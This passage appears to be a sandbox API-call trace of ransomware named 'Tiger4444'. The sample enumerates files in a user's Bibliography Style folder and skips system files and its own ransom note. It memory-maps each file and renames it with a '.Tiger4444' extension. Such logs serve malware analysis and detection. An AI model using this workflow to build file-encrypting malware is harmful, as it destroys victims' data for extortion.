lpString2="boot") returned 1 [0055.344] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="ids.txt") returned 1 [0055.344] lstrcmpiW (lpString1="IEEE2006OfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0055.344] lstrcpyW (in: lpString1=0x30aeb22, lpString2="IEEE2006OfficeOnline.xsl" | out: lpString1="IEEE2006OfficeOnline.xsl") returned="IEEE2006OfficeOnline.xsl" [0055.344] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0055.344] lstrlenW (lpString="IEEE2006OfficeOnline.xsl") returned 24 [0055.344] lstrlenW (lpString="Tiger4444") returned 9 [0055.344] lstrcmpiW (lpString1="nline.xsl", lpString2="Tiger4444") returned -1 [0055.344] lstrlenW (lpString=".dll") returned 4 [0055.344] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0055.344] lstrlenW (lpString=".lnk") returned 4 [0055.344] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0055.344] lstrlenW (lpString=".ini") returned 4 [0055.344] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0055.344] lstrlenW (lpString=".sys") returned 4 [0055.344] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0055.345] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.345] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.345] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14679797542) returned 1 [0055.345] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=294525) returned 1 [0055.345] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0055.345] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ea0 [0055.345] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x48180, lpName=0x0) returned 0x2cc [0055.346] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x48180) returned 0xbe0000 [0055.558] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0055.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0055.559] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0055.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0055.559] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14701223767) returned 1 [0055.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0055.559] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ea0 | out: hHeap=0xc50000) returned 1 [0055.559] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.562] CloseHandle (hObject=0x2cc) returned 1 [0055.562] CloseHandle (hObject=0x2b8) returned 1 [0055.562] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.Tiger4444") returned 95 [0055.562] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.563] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2cbf800, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="Tiger4444.exe") returned -1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2=".") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="..") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="windows") returned -1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="bootmgr") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="pagefile.sys") returned -1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="boot") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ids.txt") returned 1 [0055.563] lstrcmpiW (lpString1="ISO690.XSL", lpString2="NTUSER.DAT") returned -1 [0055.563] lstrcpyW (in: lpString1=0x30aeb22, lpString2="ISO690.XSL" | out: lpString1="ISO690.XSL") returned="ISO690.XSL" [0055.563] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL", dwFileAttributes=0x0) returned 1 [0055.563] lstrlenW (lpString="ISO690.XSL") returned 10 [0055.563] lstrlenW (lpString="Tiger4444") returned 9 [0055.563] lstrcmpiW (lpString1="SO690.XSL", lpString2="Tiger4444") returned -1 [0055.563] lstrlenW (lpString=".dll") returned 4 [0055.563] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0055.563] lstrlenW (lpString=".lnk") returned 4 [0055.563] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0055.563] lstrlenW (lpString=".ini") returned 4 [0055.563] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0055.563] lstrlenW (lpString=".sys") returned 4 [0055.563] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0055.563] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.564] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.564] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14701673648) returned 1 [0055.564] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=270642) returned 1 [0055.564] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89860 [0055.564] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0055.564] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42440, lpName=0x0) returned 0x2cc [0055.640] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42440) returned 0xbe0000 [0055.763] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0055.763] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0055.763] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0055.763] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0055.763] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0055.763] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0055.763] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0055.763] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0055.763] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14721629677) returned 1 [0055.763] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89860 | out: hHeap=0xc50000) returned 1 [0055.763] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0055.763] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0055.765] CloseHandle (hObject=0x2cc) returned 1 [0055.766] CloseHandle (hObject=0x2b8) returned 1 [0055.766] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.Tiger4444") returned 81 [0055.766] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl.tiger4444"), dwFlags=0x1) returned 1 [0055.766] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2bb4725, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="Tiger4444.exe") returned -1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2=".") returned 1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="..") returned 1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="windows") returned -1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="bootmgr") returned 1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="pagefile.sys") returned -1 [0055.766] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="boot") returned 1 [0055.767] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ids.txt") returned 1 [0055.767] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="NTUSER.DAT") returned -1 [0055.767] lstrcpyW (in: lpString1=0x30aeb22, lpString2="ISO690Nmerical.XSL" | out: lpString1="ISO690Nmerical.XSL") returned="ISO690Nmerical.XSL" [0055.767] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL", dwFileAttributes=0x0) returned 1 [0055.767] lstrlenW (lpString="ISO690Nmerical.XSL") returned 18 [0055.767] lstrlenW (lpString="Tiger4444") returned 9 [0055.767] lstrcmpiW (lpString1="rical.XSL", lpString2="Tiger4444") returned -1 [0055.767] lstrlenW (lpString=".dll") returned 4 [0055.767] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0055.767] lstrlenW (lpString=".lnk") returned 4 [0055.767] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0055.767] lstrlenW (lpString=".ini") returned 4 [0055.767] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0055.767] lstrlenW (lpString=".sys") returned 4 [0055.767] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0055.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0055.767] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0055.767] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14722044705) returned 1 [0055.767] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=217578) returned 1 [0055.767] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0055.767] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71488 [0055.767] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x354f0, lpName=0x0) returned 0x2cc [0055.768] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x354f0) returned 0xbe0000 [0056.043] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0056.043] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0056.043] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0056.043] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0056.043] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0056.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0056.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0056.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0056.044] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14749677236) returned 1 [0056.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0056.044] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71488 | out: hHeap=0xc50000) returned 1 [0056.044] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0056.046] CloseHandle (hObject=0x2cc) returned 1 [0056.046] CloseHandle (hObject=0x2b8) returned 1 [0056.046] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.Tiger4444") returned 89 [0056.046] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl.tiger4444"), dwFlags=0x1) returned 1 [0056.047] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x372dd15, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="Tiger4444.exe") returned -1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="..") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="windows") returned -1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="bootmgr") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="boot") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ids.txt") returned 1 [0056.047] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0056.047] lstrcpyW (in: lpString1=0x30aeb22, lpString2="MLASeventhEditionOfficeOnline.xsl" | out: lpString1="MLASeventhEditionOfficeOnline.xsl") returned="MLASeventhEditionOfficeOnline.xsl" [0056.047] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0056.048] lstrlenW (lpString="MLASeventhEditionOfficeOnline.xsl") returned 33 [0056.048] lstrlenW (lpString="Tiger4444") returned 9 [0056.048] lstrcmpiW (lpString1="nline.xsl", lpString2="Tiger4444") returned -1 [0056.048] lstrlenW (lpString=".dll") returned 4 [0056.048] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0056.048] lstrlenW (lpString=".lnk") returned 4 [0056.048] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0056.048] lstrlenW (lpString=".ini") returned 4 [0056.048] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0056.048] lstrlenW (lpString=".sys") returned 4 [0056.048] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0056.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0056.048] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0056.048] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14750125557) returned 1 [0056.048] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=255219) returned 1 [0056.048] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0056.048] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0056.048] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e800, lpName=0x0) returned 0x2cc [0056.049] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e800) returned 0xbe0000 [0056.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0056.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0056.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0056.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0056.120] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0056.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0056.120] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0056.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0056.121] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14757368652) returned 1 [0056.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0056.121] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0056.121] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0056.123] CloseHandle (hObject=0x2cc) returned 1 [0056.123] CloseHandle (hObject=0x2b8) returned 1 [0056.123] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.Tiger4444") returned 104 [0056.123] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl.tiger4444"), dwFlags=0x1) returned 1 [0056.124] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2b42021, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="Tiger4444.exe") returned -1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2=".") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="..") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="windows") returned -1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="bootmgr") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="pagefile.sys") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="boot") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ids.txt") returned 1 [0056.124] lstrcmpiW (lpString1="SIST02.XSL", lpString2="NTUSER.DAT") returned 1 [0056.124] lstrcpyW (in: lpString1=0x30aeb22, lpString2="SIST02.XSL" | out: lpString1="SIST02.XSL") returned="SIST02.XSL" [0056.124] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL", dwFileAttributes=0x0) returned 1 [0056.124] lstrlenW (lpString="SIST02.XSL") returned 10 [0056.124] lstrlenW (lpString="Tiger4444") returned 9 [0056.124] lstrcmpiW (lpString1="IST02.XSL", lpString2="Tiger4444") returned -1 [0056.124] lstrlenW (lpString=".dll") returned 4 [0056.124] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0056.124] lstrlenW (lpString=".lnk") returned 4 [0056.124] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0056.125] lstrlenW (lpString=".ini") returned 4 [0056.125] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0056.125] lstrlenW (lpString=".sys") returned 4 [0056.125] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0056.125] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0056.125] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0056.125] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14757796658) returned 1 [0056.125] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=251336) returned 1 [0056.125] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0056.125] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0056.125] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d8d0, lpName=0x0) returned 0x2cc [0056.129] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d8d0) returned 0xbe0000 